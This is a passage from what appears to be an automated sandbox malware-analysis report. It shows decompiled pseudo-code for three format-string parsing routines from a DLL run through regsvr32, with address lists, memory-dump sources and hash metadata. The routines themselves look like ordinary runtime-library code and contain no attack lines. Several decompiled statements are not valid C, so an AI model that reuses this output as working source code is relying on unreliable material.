				 *((long long*)(_t149 + 8)) = __rbx;
				 *((long long*)(_t149 + 0x10)) = __rbp;
				 *((long long*)(_t149 + 0x18)) = __rsi;
				 *((long long*)(_t149 + 0x20)) = __rdi;
				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0x8001b87f;
				_t89 = E0000000118002E69C(_t149);
				 *_t149 = 0x16;
				E0000000118002E4F0(_t89);
				goto 0x8001ba97;
				if ( *(__rcx + 0x18) == __rsi) goto 0x8001b867;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x8001ba94;
				_t122 = __edi | 0xffffffff;
				_t124 = __rdi + 0x21;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				goto 0x8001ba5d;
				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
				if ( *(__rcx + 0x28) < 0) goto 0x8001ba76;
				if (( *(__rcx + 0x42) & 0x0000ffff) - _t124 - 0x5a > 0) goto 0x8001b8dd;
				goto 0x8001b8df;
				_t107 = ( *(__rcx + 0x8004ba40) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t107;
				if (_t107 == 8) goto 0x8001bab2;
				_t131 = _t107;
				if (_t131 == 0) goto 0x8001ba08;
				if (_t131 == 0) goto 0x8001b9f4;
				if (_t131 == 0) goto 0x8001b9b4;
				if (_t131 == 0) goto 0x8001b982;
				if (_t131 == 0) goto 0x8001b97a;
				if (_t131 == 0) goto 0x8001b949;
				if (_t131 == 0) goto 0x8001b93c;
				if (_t107 - 0xfffffffffffffffc != 1) goto 0x8001bac2;
				E00000001180020030(__rcx, __rcx, __rsi, __rbp);
				goto 0x8001ba59;
				E0000000118001E3BC(_t149, __rcx);
				goto 0x8001ba59;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x8001b961;
				E0000000118001A198(__rcx, __rcx, __rcx + 0x38, _t171, _t173);
				goto 0x8001ba59;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t114 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				_t115 =  <  ? _t122 : _t114;
				 *(__rcx + 0x38) =  <  ? _t122 : _t114;
				goto 0x8001ba57;
				 *(__rcx + 0x38) = 0;
				goto 0x8001ba5d;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x8001b98f;
				goto 0x8001b954;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t116 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				 *(__rcx + 0x34) = _t116;
				if (_t116 >= 0) goto 0x8001ba57;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				 *(__rcx + 0x34) =  ~_t116;
				goto 0x8001ba57;
				_t99 =  *(__rcx + 0x42) & 0x0000ffff;
				if (_t99 == _t124) goto 0x8001b9ee;
				if (_t99 == 0x23) goto 0x8001b9e9;
				if (_t99 == 0x2b) goto 0x8001b9e3;
				if (_t99 == 0x2d) goto 0x8001b9dd;
				if (_t99 != 0x30) goto 0x8001ba5d;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000008;
				goto 0x8001ba5d;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				goto 0x8001ba5d;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000001;
				goto 0x8001ba5d;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | _t124;
				goto 0x8001ba5d;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000002;
				goto 0x8001ba5d;
				 *(__rcx + 0x30) = _t171;
				 *((intOrPtr*)(__rcx + 0x40)) = sil;
				 *(__rcx + 0x38) = _t122;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0;
				 *((intOrPtr*)(__rcx + 0x54)) = sil;
				goto 0x8001ba5d;
				 *((char*)(__rcx + 0x54)) = 1;
				_t164 =  *((intOrPtr*)(__rcx + 0x468));
				if ( *((intOrPtr*)(_t164 + 0x10)) !=  *((intOrPtr*)(_t164 + 8))) goto 0x8001ba31;
				if ( *((intOrPtr*)(_t164 + 0x18)) == sil) goto 0x8001ba2c;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) + 1;
				goto 0x8001ba57;
				 *(__rcx + 0x28) = _t122;
				goto 0x8001ba57;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) + 1;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x468)) + 0x10)) =  *((long long*)( *((intOrPtr*)(__rcx + 0x468)) + 0x10)) + 1;
				 *((short*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x468)))))) =  *(__rcx + 0x42) & 0x0000ffff;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x468)))) =  *((long long*)( *((intOrPtr*)(__rcx + 0x468)))) + 2;
				if (1 == 0) goto 0x8001bac2;
				_t118 =  *( *(__rcx + 0x18)) & 0x0000ffff;
				 *(__rcx + 0x42) = _t118;
				if (_t118 != 0) goto 0x8001b8b0;
				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
				if ( *(__rcx + 0x2c) == 0) goto 0x8001ba81;
				if ( *(__rcx + 0x2c) != 7) goto 0x8001bab2;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) != 2) goto 0x8001b8a5;
				return  *(__rcx + 0x28);
			}
















                                                                                                    0x18001b840
                                                                                                    0x18001b840
                                                                                                    0x18001b840
                                                                                                    0x18001b843
                                                                                                    0x18001b847
                                                                                                    0x18001b84b
                                                                                                    0x18001b84f
                                                                                                    0x18001b865
                                                                                                    0x18001b867
                                                                                                    0x18001b86c
                                                                                                    0x18001b872
                                                                                                    0x18001b87a
                                                                                                    0x18001b883
                                                                                                    0x18001b885
                                                                                                    0x18001b892
                                                                                                    0x18001b898
                                                                                                    0x18001b8a2
                                                                                                    0x18001b8a5
                                                                                                    0x18001b8a8
                                                                                                    0x18001b8ab
                                                                                                    0x18001b8b0
                                                                                                    0x18001b8b8
                                                                                                    0x18001b8cc
                                                                                                    0x18001b8db
                                                                                                    0x18001b8e9
                                                                                                    0x18001b8ec
                                                                                                    0x18001b8f2
                                                                                                    0x18001b8f8
                                                                                                    0x18001b8fa
                                                                                                    0x18001b903
                                                                                                    0x18001b90c
                                                                                                    0x18001b915
                                                                                                    0x18001b91a
                                                                                                    0x18001b91f
                                                                                                    0x18001b924
                                                                                                    0x18001b929
                                                                                                    0x18001b932
                                                                                                    0x18001b937
                                                                                                    0x18001b93f
                                                                                                    0x18001b944
                                                                                                    0x18001b94e
                                                                                                    0x18001b957
                                                                                                    0x18001b95c
                                                                                                    0x18001b961
                                                                                                    0x18001b96a
                                                                                                    0x18001b96f
                                                                                                    0x18001b972
                                                                                                    0x18001b975
                                                                                                    0x18001b97a
                                                                                                    0x18001b97d
                                                                                                    0x18001b987
                                                                                                    0x18001b98d
                                                                                                    0x18001b98f
                                                                                                    0x18001b998
                                                                                                    0x18001b99b
                                                                                                    0x18001b9a0
                                                                                                    0x18001b9a6
                                                                                                    0x18001b9ac
                                                                                                    0x18001b9af
                                                                                                    0x18001b9b4
                                                                                                    0x18001b9ba
                                                                                                    0x18001b9bf
                                                                                                    0x18001b9c4
                                                                                                    0x18001b9c9
                                                                                                    0x18001b9ce
                                                                                                    0x18001b9d4
                                                                                                    0x18001b9d8
                                                                                                    0x18001b9dd
                                                                                                    0x18001b9e1
                                                                                                    0x18001b9e3
                                                                                                    0x18001b9e7
                                                                                                    0x18001b9e9
                                                                                                    0x18001b9ec
                                                                                                    0x18001b9ee
                                                                                                    0x18001b9f2
                                                                                                    0x18001b9f4
                                                                                                    0x18001b9f8
                                                                                                    0x18001b9fc
                                                                                                    0x18001b9ff
                                                                                                    0x18001ba02
                                                                                                    0x18001ba06
                                                                                                    0x18001ba0c
                                                                                                    0x18001ba10
                                                                                                    0x18001ba1f
                                                                                                    0x18001ba25
                                                                                                    0x18001ba27
                                                                                                    0x18001ba2a
                                                                                                    0x18001ba2c
                                                                                                    0x18001ba2f
                                                                                                    0x18001ba31
                                                                                                    0x18001ba3b
                                                                                                    0x18001ba49
                                                                                                    0x18001ba53
                                                                                                    0x18001ba5b
                                                                                                    0x18001ba61
                                                                                                    0x18001ba64
                                                                                                    0x18001ba6b
                                                                                                    0x18001ba71
                                                                                                    0x18001ba79
                                                                                                    0x18001ba7f
                                                                                                    0x18001ba81
                                                                                                    0x18001ba8e
                                                                                                    0x18001bab1

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: *
                                                                                                    • API String ID: 3215553584-163128923
                                                                                                    • Opcode ID: 76263112664e313664333fceda3bbcb0cf906907206e4171fdcf493a787c7571
                                                                                                    • Instruction ID: 3ff7b595d467d9e2784a4657235371f0fec183f0822d6324c4975daace0bcce7
                                                                                                    • Opcode Fuzzy Hash: 76263112664e313664333fceda3bbcb0cf906907206e4171fdcf493a787c7571
                                                                                                    • Instruction Fuzzy Hash: 77818272100A58C6E7FA8F29C0543AC3BB8F74DF88F65911AEB4682294DF31C68AD751
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001B090 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 63%
                                                                                                    			E0000000118001B090(signed int __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t85;
				signed int _t95;
				unsigned int _t104;
				signed int _t111;
				signed int _t113;
				signed int _t119;
				signed int _t122;
				unsigned int _t130;
				intOrPtr* _t149;
				void* _t156;
				signed int _t168;
				void* _t170;
				intOrPtr* _t171;

				_t168 = __rsi;
				_t149 = _t171;
				 *((long long*)(_t149 + 8)) = __rbx;
				 *((long long*)(_t149 + 0x10)) = __rsi;
				 *((long long*)(_t149 + 0x18)) = __rdi;
				 *((long long*)(_t149 + 0x20)) = __r14;
				_t156 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0x8001b0cf;
				_t85 = E0000000118002E69C(_t149);
				 *_t149 = 0x16;
				E0000000118002E4F0(_t85);
				goto 0x8001b2e3;
				if ( *((intOrPtr*)(__rcx + 0x18)) == __rsi) goto 0x8001b0b7;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x8001b2e0;
				_t122 = __edi | 0xffffffff;
				r14d = __rdi + 0x21;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				goto 0x8001b2a9;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 2;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x8001b2c2;
				if (( *(__rcx + 0x42) & 0x0000ffff) - r14w - 0x5a > 0) goto 0x8001b12f;
				goto 0x8001b131;
				_t104 = ( *(__rcx + 0x8004ba40) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t104;
				if (_t104 == 8) goto 0x8001b2fe;
				_t130 = _t104;
				if (_t130 == 0) goto 0x8001b259;
				if (_t130 == 0) goto 0x8001b245;
				if (_t130 == 0) goto 0x8001b206;
				if (_t130 == 0) goto 0x8001b1d4;
				if (_t130 == 0) goto 0x8001b1cc;
				if (_t130 == 0) goto 0x8001b19b;
				if (_t130 == 0) goto 0x8001b18e;
				if (_t104 - 0xfffffffffffffffc != 1) goto 0x8001b30e;
				E0000000118001F7B8(__rcx, __rcx, __rdx, __rsi, _t170);
				goto 0x8001b2a5;
				E0000000118001DED0(_t149, __rcx);
				goto 0x8001b2a5;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x8001b1b3;
				E0000000118001A018(__rcx, __rcx, __rcx + 0x38, _t168, _t170);
				goto 0x8001b2a5;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t111 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				_t112 =  <  ? _t122 : _t111;
				 *(__rcx + 0x38) =  <  ? _t122 : _t111;
				goto 0x8001b2a3;
				 *(__rcx + 0x38) = 0;
				goto 0x8001b2a9;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x8001b1e1;
				goto 0x8001b1a6;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t113 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				 *(__rcx + 0x34) = _t113;
				if (_t113 >= 0) goto 0x8001b2a3;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				 *(__rcx + 0x34) =  ~_t113;
				goto 0x8001b2a3;
				_t95 =  *(__rcx + 0x42) & 0x0000ffff;
				if (_t95 == r14d) goto 0x8001b23f;
				if (_t95 == 0x23) goto 0x8001b239;
				if (_t95 == 0x2b) goto 0x8001b233;
				if (_t95 == 0x2d) goto 0x8001b22d;
				if (_t95 != 0x30) goto 0x8001b2a9;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000008;
				goto 0x8001b2a9;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				goto 0x8001b2a9;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000001;
				goto 0x8001b2a9;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | r14d;
				goto 0x8001b2a9;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000002;
				goto 0x8001b2a9;
				 *(__rcx + 0x30) = _t168;
				 *((intOrPtr*)(__rcx + 0x40)) = sil;
				 *(__rcx + 0x38) = _t122;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0;
				 *((intOrPtr*)(__rcx + 0x54)) = sil;
				goto 0x8001b2a9;
				r8d =  *(__rcx + 0x42) & 0x0000ffff;
				 *((char*)(__rcx + 0x54)) = 1;
				if (( *( *((intOrPtr*)(__rcx + 0x468)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8001b281;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x468)) + 8)) == _t168) goto 0x8001b2a0;
				if (E00000001180035B9C(r8w & 0xffffffff, __rcx,  *((intOrPtr*)(__rcx + 0x468))) != 0xffff) goto 0x8001b2a0;
				 *(_t156 + 0x28) = _t122;
				goto 0x8001b2a3;
				 *(_t156 + 0x28) =  *(_t156 + 0x28) + 1;
				if (1 == 0) goto 0x8001b30e;
				_t119 =  *( *(_t156 + 0x18)) & 0x0000ffff;
				 *(_t156 + 0x42) = _t119;
				if (_t119 != 0) goto 0x8001b101;
				 *(_t156 + 0x18) =  &(( *(_t156 + 0x18))[1]);
				if ( *((intOrPtr*)(_t156 + 0x2c)) == 0) goto 0x8001b2cd;
				if ( *((intOrPtr*)(_t156 + 0x2c)) != 7) goto 0x8001b2fe;
				 *((intOrPtr*)(_t156 + 0x470)) =  *((intOrPtr*)(_t156 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t156 + 0x470)) != 2) goto 0x8001b0f6;
				return  *(_t156 + 0x28);
			}
















                                                                                                    0x18001b090
                                                                                                    0x18001b090
                                                                                                    0x18001b093
                                                                                                    0x18001b097
                                                                                                    0x18001b09b
                                                                                                    0x18001b09f
                                                                                                    0x18001b0ab
                                                                                                    0x18001b0b5
                                                                                                    0x18001b0b7
                                                                                                    0x18001b0bc
                                                                                                    0x18001b0c2
                                                                                                    0x18001b0ca
                                                                                                    0x18001b0d3
                                                                                                    0x18001b0d5
                                                                                                    0x18001b0e2
                                                                                                    0x18001b0e8
                                                                                                    0x18001b0f2
                                                                                                    0x18001b0f6
                                                                                                    0x18001b0f9
                                                                                                    0x18001b0fc
                                                                                                    0x18001b101
                                                                                                    0x18001b109
                                                                                                    0x18001b11e
                                                                                                    0x18001b12d
                                                                                                    0x18001b13b
                                                                                                    0x18001b13e
                                                                                                    0x18001b144
                                                                                                    0x18001b14a
                                                                                                    0x18001b14c
                                                                                                    0x18001b155
                                                                                                    0x18001b15e
                                                                                                    0x18001b167
                                                                                                    0x18001b16c
                                                                                                    0x18001b171
                                                                                                    0x18001b176
                                                                                                    0x18001b17b
                                                                                                    0x18001b184
                                                                                                    0x18001b189
                                                                                                    0x18001b191
                                                                                                    0x18001b196
                                                                                                    0x18001b1a0
                                                                                                    0x18001b1a9
                                                                                                    0x18001b1ae
                                                                                                    0x18001b1b3
                                                                                                    0x18001b1bc
                                                                                                    0x18001b1c1
                                                                                                    0x18001b1c4
                                                                                                    0x18001b1c7
                                                                                                    0x18001b1cc
                                                                                                    0x18001b1cf
                                                                                                    0x18001b1d9
                                                                                                    0x18001b1df
                                                                                                    0x18001b1e1
                                                                                                    0x18001b1ea
                                                                                                    0x18001b1ed
                                                                                                    0x18001b1f2
                                                                                                    0x18001b1f8
                                                                                                    0x18001b1fe
                                                                                                    0x18001b201
                                                                                                    0x18001b206
                                                                                                    0x18001b20d
                                                                                                    0x18001b212
                                                                                                    0x18001b217
                                                                                                    0x18001b21c
                                                                                                    0x18001b221
                                                                                                    0x18001b227
                                                                                                    0x18001b22b
                                                                                                    0x18001b22d
                                                                                                    0x18001b231
                                                                                                    0x18001b233
                                                                                                    0x18001b237
                                                                                                    0x18001b239
                                                                                                    0x18001b23d
                                                                                                    0x18001b23f
                                                                                                    0x18001b243
                                                                                                    0x18001b245
                                                                                                    0x18001b249
                                                                                                    0x18001b24d
                                                                                                    0x18001b250
                                                                                                    0x18001b253
                                                                                                    0x18001b257
                                                                                                    0x18001b259
                                                                                                    0x18001b25e
                                                                                                    0x18001b272
                                                                                                    0x18001b27f
                                                                                                    0x18001b299
                                                                                                    0x18001b29b
                                                                                                    0x18001b29e
                                                                                                    0x18001b2a0
                                                                                                    0x18001b2a7
                                                                                                    0x18001b2ad
                                                                                                    0x18001b2b0
                                                                                                    0x18001b2b7
                                                                                                    0x18001b2bd
                                                                                                    0x18001b2c5
                                                                                                    0x18001b2cb
                                                                                                    0x18001b2cd
                                                                                                    0x18001b2da
                                                                                                    0x18001b2fd

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: *
                                                                                                    • API String ID: 3215553584-163128923
                                                                                                    • Opcode ID: fdee444078e493e510b35303339bf6224f400c91bd7ddc1f7c40acf6d2a80dd6
                                                                                                    • Instruction ID: bd8d90231f0a4c45cdcc97136be02e2a2dc9a0c31b71524d5faf87021c176940
                                                                                                    • Opcode Fuzzy Hash: fdee444078e493e510b35303339bf6224f400c91bd7ddc1f7c40acf6d2a80dd6
                                                                                                    • Instruction Fuzzy Hash: 29719572510A1886E7EA9F3980543BD3BA8F34DF98F25911AFB4683694DF34C68DC704
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001BD7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 56%
                                                                                                    			E0000000118001BD7C(signed int __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t87;
				unsigned int _t95;
				signed int _t105;
				signed int _t111;
				signed int _t113;
				signed int _t115;
				signed int _t119;
				signed int _t121;
				unsigned int _t128;
				intOrPtr* _t144;
				intOrPtr _t159;
				signed int _t166;
				intOrPtr* _t170;

				_t168 = __rbp;
				_t166 = __rsi;
				_t144 = _t170;
				 *((long long*)(_t144 + 8)) = __rbx;
				 *((long long*)(_t144 + 0x10)) = __rbp;
				 *((long long*)(_t144 + 0x18)) = __rsi;
				 *((long long*)(_t144 + 0x20)) = __rdi;
				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0x8001bdbb;
				_t87 = E0000000118002E69C(_t144);
				 *_t144 = 0x16;
				E0000000118002E4F0(_t87);
				goto 0x8001bfc6;
				if ( *(__rcx + 0x18) == __rsi) goto 0x8001bda3;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x8001bfc3;
				_t119 = __edi | 0xffffffff;
				_t121 = __rdi + 0x21;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				goto 0x8001bf97;
				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
				if ( *(__rcx + 0x28) < 0) goto 0x8001bfb0;
				if (( *(__rcx + 0x42) & 0x0000ffff) - _t121 - 0x5a > 0) goto 0x8001be19;
				goto 0x8001be1b;
				_t95 = ( *(_t144 + 0x8004b9e0) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t95;
				if (_t95 == 8) goto 0x8001bfe1;
				_t128 = _t95;
				if (_t128 == 0) goto 0x8001bf42;
				if (_t128 == 0) goto 0x8001bf2e;
				if (_t128 == 0) goto 0x8001beee;
				if (_t128 == 0) goto 0x8001bebc;
				if (_t128 == 0) goto 0x8001beb4;
				if (_t128 == 0) goto 0x8001be83;
				if (_t128 == 0) goto 0x8001be76;
				if (_t95 - 0xfffffffffffffffc != 1) goto 0x8001bff1;
				E000000011800205DC(__rcx, __rcx, __rsi, __rbp);
				goto 0x8001bf93;
				E0000000118001E704(_t144, __rcx);
				goto 0x8001bf93;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x8001be9b;
				E0000000118001A298(__rcx, __rcx, __rcx + 0x38, _t166, _t168);
				goto 0x8001bf93;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t111 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				_t112 =  <  ? _t119 : _t111;
				 *(__rcx + 0x38) =  <  ? _t119 : _t111;
				goto 0x8001bf91;
				 *(__rcx + 0x38) = 0;
				goto 0x8001bf97;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x8001bec9;
				goto 0x8001be8e;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t113 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				 *(__rcx + 0x34) = _t113;
				if (_t113 >= 0) goto 0x8001bf91;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				 *(__rcx + 0x34) =  ~_t113;
				goto 0x8001bf91;
				_t105 =  *(__rcx + 0x42) & 0x0000ffff;
				if (_t105 == _t121) goto 0x8001bf28;
				if (_t105 == 0x23) goto 0x8001bf23;
				if (_t105 == 0x2b) goto 0x8001bf1d;
				if (_t105 == 0x2d) goto 0x8001bf17;
				if (_t105 != 0x30) goto 0x8001bf97;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000008;
				goto 0x8001bf97;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				goto 0x8001bf97;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000001;
				goto 0x8001bf97;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | _t121;
				goto 0x8001bf97;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000002;
				goto 0x8001bf97;
				 *(__rcx + 0x30) = _t166;
				 *((intOrPtr*)(__rcx + 0x40)) = sil;
				 *(__rcx + 0x38) = _t119;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0;
				 *((intOrPtr*)(__rcx + 0x54)) = sil;
				goto 0x8001bf97;
				 *((char*)(__rcx + 0x54)) = 1;
				_t159 =  *((intOrPtr*)(__rcx + 0x468));
				if ( *((intOrPtr*)(_t159 + 0x10)) !=  *((intOrPtr*)(_t159 + 8))) goto 0x8001bf6b;
				if ( *((intOrPtr*)(_t159 + 0x18)) == sil) goto 0x8001bf66;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) + 1;
				goto 0x8001bf91;
				 *(__rcx + 0x28) = _t119;
				goto 0x8001bf91;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) + 1;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x468)) + 0x10)) =  *((long long*)( *((intOrPtr*)(__rcx + 0x468)) + 0x10)) + 1;
				 *((short*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x468)))))) =  *(__rcx + 0x42) & 0x0000ffff;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x468)))) =  *((long long*)( *((intOrPtr*)(__rcx + 0x468)))) + 2;
				if (1 == 0) goto 0x8001bff1;
				_t115 =  *( *(__rcx + 0x18)) & 0x0000ffff;
				 *(__rcx + 0x42) = _t115;
				if (_t115 != 0) goto 0x8001bdec;
				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) != 2) goto 0x8001bde1;
				return  *(__rcx + 0x28);
			}
















                                                                                                    0x18001bd7c
                                                                                                    0x18001bd7c
                                                                                                    0x18001bd7c
                                                                                                    0x18001bd7f
                                                                                                    0x18001bd83
                                                                                                    0x18001bd87
                                                                                                    0x18001bd8b
                                                                                                    0x18001bda1
                                                                                                    0x18001bda3
                                                                                                    0x18001bda8
                                                                                                    0x18001bdae
                                                                                                    0x18001bdb6
                                                                                                    0x18001bdbf
                                                                                                    0x18001bdc1
                                                                                                    0x18001bdce
                                                                                                    0x18001bdd4
                                                                                                    0x18001bdde
                                                                                                    0x18001bde1
                                                                                                    0x18001bde4
                                                                                                    0x18001bde7
                                                                                                    0x18001bdec
                                                                                                    0x18001bdf4
                                                                                                    0x18001be08
                                                                                                    0x18001be17
                                                                                                    0x18001be23
                                                                                                    0x18001be26
                                                                                                    0x18001be2c
                                                                                                    0x18001be32
                                                                                                    0x18001be34
                                                                                                    0x18001be3d
                                                                                                    0x18001be46
                                                                                                    0x18001be4f
                                                                                                    0x18001be54
                                                                                                    0x18001be59
                                                                                                    0x18001be5e
                                                                                                    0x18001be63
                                                                                                    0x18001be6c
                                                                                                    0x18001be71
                                                                                                    0x18001be79
                                                                                                    0x18001be7e
                                                                                                    0x18001be88
                                                                                                    0x18001be91
                                                                                                    0x18001be96
                                                                                                    0x18001be9b
                                                                                                    0x18001bea4
                                                                                                    0x18001bea9
                                                                                                    0x18001beac
                                                                                                    0x18001beaf
                                                                                                    0x18001beb4
                                                                                                    0x18001beb7
                                                                                                    0x18001bec1
                                                                                                    0x18001bec7
                                                                                                    0x18001bec9
                                                                                                    0x18001bed2
                                                                                                    0x18001bed5
                                                                                                    0x18001beda
                                                                                                    0x18001bee0
                                                                                                    0x18001bee6
                                                                                                    0x18001bee9
                                                                                                    0x18001beee
                                                                                                    0x18001bef4
                                                                                                    0x18001bef9
                                                                                                    0x18001befe
                                                                                                    0x18001bf03
                                                                                                    0x18001bf08
                                                                                                    0x18001bf0e
                                                                                                    0x18001bf12
                                                                                                    0x18001bf17
                                                                                                    0x18001bf1b
                                                                                                    0x18001bf1d
                                                                                                    0x18001bf21
                                                                                                    0x18001bf23
                                                                                                    0x18001bf26
                                                                                                    0x18001bf28
                                                                                                    0x18001bf2c
                                                                                                    0x18001bf2e
                                                                                                    0x18001bf32
                                                                                                    0x18001bf36
                                                                                                    0x18001bf39
                                                                                                    0x18001bf3c
                                                                                                    0x18001bf40
                                                                                                    0x18001bf46
                                                                                                    0x18001bf4a
                                                                                                    0x18001bf59
                                                                                                    0x18001bf5f
                                                                                                    0x18001bf61
                                                                                                    0x18001bf64
                                                                                                    0x18001bf66
                                                                                                    0x18001bf69
                                                                                                    0x18001bf6b
                                                                                                    0x18001bf75
                                                                                                    0x18001bf83
                                                                                                    0x18001bf8d
                                                                                                    0x18001bf95
                                                                                                    0x18001bf9b
                                                                                                    0x18001bf9e
                                                                                                    0x18001bfa5
